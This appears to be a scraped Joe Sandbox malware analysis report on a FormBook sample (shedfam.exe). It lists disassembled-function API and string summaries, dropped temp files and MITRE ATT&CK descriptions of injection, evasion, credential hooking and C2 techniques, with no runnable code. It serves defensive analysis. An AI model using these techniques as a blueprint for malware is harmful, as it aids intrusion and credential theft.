Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 644e6984d8235d5dbe1b5858ac8e2854a53b5511647ea0a947ee8c6e402ac895
Instruction ID: 914a8186c37db53feb598104daf163d441c35faf4a5e9bcceb7a98de206e6523
Opcode Fuzzy Hash: 644e6984d8235d5dbe1b5858ac8e2854a53b5511647ea0a947ee8c6e402ac895
Instruction Fuzzy Hash: A101F772E411196BCB14EBA0DD52EFFB3E8DF11310F240019B861B3281EA645E48A6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00F2993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00F299A6

Strings

ListBox, xrefs: 00F29972
ComboBox, xrefs: 00F29947

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7cd560181611534107d1f384f45b80f8fc6df36608ab8fe0f2c9b16f493764fd
Instruction ID: 8f84d7015a7de8b37aafd64611b27a5830f33b3acad41cec63175456d597844a
Opcode Fuzzy Hash: 7cd560181611534107d1f384f45b80f8fc6df36608ab8fe0f2c9b16f493764fd
Instruction Fuzzy Hash: C7012BB2E4511D67CB14EBA0DD12EFFB3EC9F11350F240019BC55B3281DA644E48A672

Uniqueness

Uniqueness Score: -1.00%

Function 00F354E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00F35501
_wcscmp.LIBCMT ref: 00F35513

Strings

#32770, xrefs: 00F3550D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 5bcf0c0727316c85e407a1637536f4a7b4cf278110fc3850c80ce73d3c1f499b
Instruction ID: 875ae0bec18adf0ec94dfe188cf330d4fd5942588e14b0eaeb68c7bd0c4dc3ca
Opcode Fuzzy Hash: 5bcf0c0727316c85e407a1637536f4a7b4cf278110fc3850c80ce73d3c1f499b
Instruction Fuzzy Hash: B3E0D17250022D17D720A759EC45FA7FBECDB55771F000057FD04D7051D960E94587D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F28892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F288A0

Part of subcall function 00EF3588: _doexit.LIBCMT ref: 00EF3592

Strings

AutoIt, xrefs: 00F28894
Error allocating memory., xrefs: 00F28899

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: ede56515961b2385ced9e81435bcc9d2509ba5bc7e2a2123071358a046e572a3
Instruction ID: 6be25f83f0882ff90067b6e5f8a09ec8a8cc339b4736ac539eefbdbe6248a13b
Opcode Fuzzy Hash: ede56515961b2385ced9e81435bcc9d2509ba5bc7e2a2123071358a046e572a3
Instruction Fuzzy Hash: C1D05B7238535C32D25572A5BC0BFDA7A888B05B61F104426FB08755D38DD6C59152D6

Uniqueness

Uniqueness Score: -1.00%

Function 00F0B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F0B544: _memset.LIBCMT ref: 00F0B551

Part of subcall function 00EF0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F0B520,?,?,?,00ED100A), ref: 00EF0B79

IsDebuggerPresent.KERNEL32(?,?,?,00ED100A), ref: 00F0B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00ED100A), ref: 00F0B533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F0B52E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 16b2bb74f827bdc0cb601acaf06ad1704703aa56e647b08273ebf23762e87357
Instruction ID: 571fba6c2713ace364e078e21456fd979fbd3807af8ad418833c4c2f45add4bb
Opcode Fuzzy Hash: 16b2bb74f827bdc0cb601acaf06ad1704703aa56e647b08273ebf23762e87357
Instruction Fuzzy Hash: 1BE092702003158FD330AF35E9097137AE0AF04704F14895EE456C2381DBB4D504FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F10251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00F10091

Part of subcall function 00F4C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00F1027A,?), ref: 00F4C6E7
Part of subcall function 00F4C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F4C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F10289

Strings

WIN_XPe, xrefs: 00F100A4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: fa7ea245fc9c2f523024f6862cad7ef7b36042980e3528877db2fea40b80cbd7
Instruction ID: 83ea539332b02a2005376b70acff8ef486ac3832ae15d33bbae384c1a91642a6
Opcode Fuzzy Hash: fa7ea245fc9c2f523024f6862cad7ef7b36042980e3528877db2fea40b80cbd7
Instruction Fuzzy Hash: 03F0A571805109DFCB55DBA4C9A8BEDBAB8AB08304F241496E14AA2190CFB54EC5EF21

Uniqueness

Uniqueness Score: -1.00%

Function 00F39EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00F39EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F39ECC

Strings

aut, xrefs: 00F39EC6

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3430a2fb78fad610c73284136eb6167b8edb61ed74300859bdb2eb861748acf4
Instruction ID: 29ea2cdfc8b290ff095072caa834405f54cd5dd1f109eeac05af3ac2178ae366
Opcode Fuzzy Hash: 3430a2fb78fad610c73284136eb6167b8edb61ed74300859bdb2eb861748acf4
Instruction Fuzzy Hash: 94D05E7554030DABDB50AB90DC0EFDBBB2CDB04B00F1042A2BE68910A2DEB095989BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00F55FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F55FEB
PostMessageW.USER32(00000000), ref: 00F55FF2

Part of subcall function 00F357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35877

Strings

Shell_TrayWnd, xrefs: 00F55FE4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 1ef4298333384e4d24530d6f47b427e785dc45d4da4b691258956c399593233a
Instruction ID: 11f0dc2eba6deb2d8aae7b780e8e744522bbdd1ccd230c400db589227228c115
Opcode Fuzzy Hash: 1ef4298333384e4d24530d6f47b427e785dc45d4da4b691258956c399593233a
Instruction Fuzzy Hash: C0D0C931385716AAE664B7709C4FFD77A14BB45B50F140825B266AA1D1CDE4A8009754

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shedfam.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\hocjhpxqy.mm

C:\Users\user\AppData\Local\Temp\kmhbvf.exe

C:\Users\user\AppData\Local\Temp\nse13E9.tmp

C:\Users\user\AppData\Local\Temp\piqsiyngg.yfg

C:\Users\user\AppData\Local\Temp\wenvaisrl.au3

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
shedfam.exe

Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313
stringfilecomCOMMON

Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156
filestringCOMMON

Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215
stringregistryCOMMON

Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 00403059 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryCOMMON

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre